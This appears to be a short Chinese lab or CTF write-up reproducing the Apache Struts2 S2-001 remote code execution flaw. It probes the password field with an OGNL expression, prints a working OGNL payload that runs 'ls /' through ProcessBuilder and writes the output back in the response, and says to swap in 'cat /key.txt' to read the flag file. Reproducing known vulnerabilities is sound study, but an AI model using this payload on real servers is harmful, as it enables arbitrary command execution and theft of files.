根据参考链接,密码框输入%(1+1)验证是否存在S-2001漏洞,用户名任意
回显2,存在漏洞,网上寻找poc,ls查看根目录下的文件,发现key.txt%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{“ls”,"/"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get(“com.opensymphony.xwork2.dispatcher.HttpServletResponse”),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
改一下payload,参数改成“cat”和“/key.txt”
得到key
Apache Struts2远程代码执行漏洞(S2-001)复现
最新推荐文章于 2024-12-29 12:43:18 发布